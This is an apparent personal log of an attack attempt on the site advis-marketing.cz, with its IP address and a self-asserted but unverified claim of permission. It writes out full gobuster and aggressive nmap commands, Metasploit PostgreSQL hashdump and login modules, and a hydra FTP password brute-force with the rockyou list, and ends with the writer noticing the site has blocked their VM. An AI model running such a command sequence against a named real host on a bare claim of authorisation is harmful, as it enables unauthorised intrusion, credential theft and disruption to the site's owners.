Web enum of advis-marketing.cz
I've got express permission to try to hack advis-marketing.cz
With simple nikto commands
IP 91.239.201.14
Server the target is using
OSVDB-877 (Open Source Vulnerability Database)
host is vulnerable to XST - Cross-Site Tracing, a vulnerability that exploits the HTTP TRACE method to potentially steal sensitive data, including authentication data and cookies, from a web application.
Some info about OSVDB-877: https://medium.com/@tushar_rs_/cross-site-tracing-attack-xst-5aa519658b7a ???
Can't find anything too specific on osvdb-877
The txt output file no longer mentions the server information
Trying Gobuster now - Directory enumeration mode
It wouldn't let me proceed because of 301 status code
Second attempt with this command:
gobuster dir -k -u advis-marketing.cz -t50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 301,403,404 -e -f --timeout 60s -o buster_advis.txt
Nmap
nmap -sC -sV -A -O -vv -p- -T5 91.239.201.14 -oN nmap_scan.txt
Metasploit on PostgreSQL
Tried a few exploits with no success
msf6 auxiliary(scanner/postgres/postgres_hashdump)
msf6 auxiliary(scanner/postgres/postgres_version)
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249)
msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249)
msf6 auxiliary(scanner/postgres/postgres_dbname_flag_injection)
msf6 auxiliary(scanner/postgres/postgres_login)
msf6 auxiliary(scanner/postgres/postgres_hashdump)
hydra
hydra -l /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt ftp://91.239.201.14
Huh, I can't seem to access advis-marketing.cz from the THM VM but I can access it from my own browser? Everything else seems to be working fine, just advis-marketing.cz not working. How could it be? Did it block my access from my IP lol? I've turned off hydra, nmap scans and everything but to no avail.